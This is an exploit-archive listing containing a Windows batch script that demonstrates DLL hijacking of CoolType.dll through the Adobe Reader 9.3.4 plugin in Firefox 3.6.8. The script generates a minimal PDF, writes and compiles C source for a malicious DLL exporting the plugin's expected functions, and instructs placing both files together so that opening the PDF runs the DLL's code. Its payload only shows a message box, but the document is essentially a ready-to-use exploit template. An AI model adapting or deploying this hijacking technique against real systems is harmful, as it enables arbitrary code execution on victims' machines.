Author

Rh0

Risk

[

Security Risk Unsored

]

0day-ID

0day-ID-13873

Category

local exploits

Date add

27-08-2010

Platform

windows

==================================================================
Mozilla Firefox 3.6.8 Adobe Reader Plugin 9.3.4.218 (CoolType.dll)
==================================================================

@echo off
GOTO START

* [*]
* [*] Mozilla Firefox 3.6.8 Adobe Reader Plugin 9.3.4.218 DLL Hijacking Exploit (CoolType.dll)
* [*]
* [*] Author: Rh0 (Rh0[at].z1p.biz)
* [*] Affected Software: Mozilla Firefox 3.6.8 with Adobe Reader Plugin 9.3.4.218
* [*] Tested on:  Windows XP Pro SP3 x86 En
* [*] Description:
*
* Affected Extensions: .pdf .pdfxml .mars .fdf .xfdf .xdp .xfd
*
* When Firefox plugins are used, the necessary DLLs for the plugin to run
* are searched in folders in the following order:
*
* mozilla firefox dir
* windows system32 dir
* windows system dir
* windows dir
* current dir <-- hijack possibility
* plugin program dir
*
* Hence, depending on the actual file, the plugin and the needed DLLs, plugin DLLs can be hijacked.
* just 2 examples for the Adobe Reader plugin:
* CoolType.dll
* authplay.dll (if the pdf contains an embedded swf file)
*
* This Batch File example creates an mininal pdf file, CoolType.c and
* compiles it to CoolType.dll (gcc has to be installed).
* When opening the pdf with Firefox, CoolType.dll gets executed, if both files are in the same directory.
* So embedded pdf files in a html file could be used to hijack Adobe Reader DLLs.
* For this  exploit to work, Firefox and the Adober Reader 9.3.4 plugin have to be installed.
* To test the other extensions simply change the extension of the pdf file, and open it with firefox


:START

echo.
echo [*] 

echo [*] Creating pdf file...

REM PDF FILENAME
set pdf=OpenwithFirefox.pdf

echo %%PDF-1.4>"%pdf%"
echo %%Змуў>>"%pdf%"
echo 1 0 obj ^<^< /Type /Catalog /ViewerPreferences ^<^< /NonFullScreenPageMode /UseNone ^>^> /PageLayout /SinglePage /Pages 2 0 R /PageMode /UseNone ^>^> endobj>>"%pdf%"
echo 2 0 obj ^<^< /Type /Pages /Kids [ 5 0 R ] /Resources 3 0 R /Count 1 ^>^> endobj>>"%pdf%"
echo 3 0 obj ^<^< /ProcSet [ /PDF /Text /ImageB /ImageC /ImageI ] ^>^> endobj>>"%pdf%"
echo 4 0 obj ^<^< /Producer (PDF::API2 0.69 [linux]) ^>^> endobj>>"%pdf%"
echo 5 0 obj ^<^< /Type /Page /Parent 2 0 R /Resources ^<^< /ProcSet [ /PDF /Text /ImageB /ImageC /ImageI ] ^>^> ^>^> endobj>>"%pdf%"
echo xref>>"%pdf%"
echo 0 6 >>"%pdf%"
echo 0000000000 65535 f>>"%pdf%"
echo 0000000015 00000 n>>"%pdf%"
echo 0000000164 00000 n>>"%pdf%"
echo 0000000240 00000 n>>"%pdf%"
echo 0000000309 00000 n>>"%pdf%" 
echo 0000000365 00000 n>>"%pdf%" 
echo trailer>>"%pdf%"
echo ^<^< /Root 1 0 R /Size 6 /Info 4 0 R ^>^>>>"%pdf%"
echo startxref>>"%pdf%"
echo 477>>"%pdf%"
echo %%%%EOF>>"%pdf%"

echo [*] %pdf% created.

echo [*]

echo [*] Creating CoolType.c source...

REM PDF FILENAME
set dllsrc=CoolType.c

echo #include ^<windows.h^>>"%dllsrc%"
echo #define DLLExport __declspec (dllexport)>>"%dllsrc%"
echo int runme()>>"%dllsrc%"
echo {>>"%dllsrc%"
echo   MessageBox(0, "Firefox with Adobe Reader Plugin DLL Hijacking", "Message from CoolType.dll", MB_OK);>>"%dllsrc%"
echo   return 0;>>"%dllsrc%"
echo }>>"%dllsrc%"
echo DLLExport void CTCleanup() { runme(); }>>"%dllsrc%"
echo DLLExport void CTGetVersion() { runme(); }>>"%dllsrc%"
echo DLLExport void CTInit() { runme(); }>>"%dllsrc%"
echo [*] Done.

echo [*] Compiling CoolType.dll...
gcc -shared -o CoolType.dll CoolType.c

echo [*] Done
echo [*]
echo [*] Copy "%pdf%" and CoolType.dll to the same 
echo [*] directory, open directory in windows explorer
echo [*] and open "%pdf%" in Firefox.
echo [*]
pause



#  0day.today [2024-11-14]  #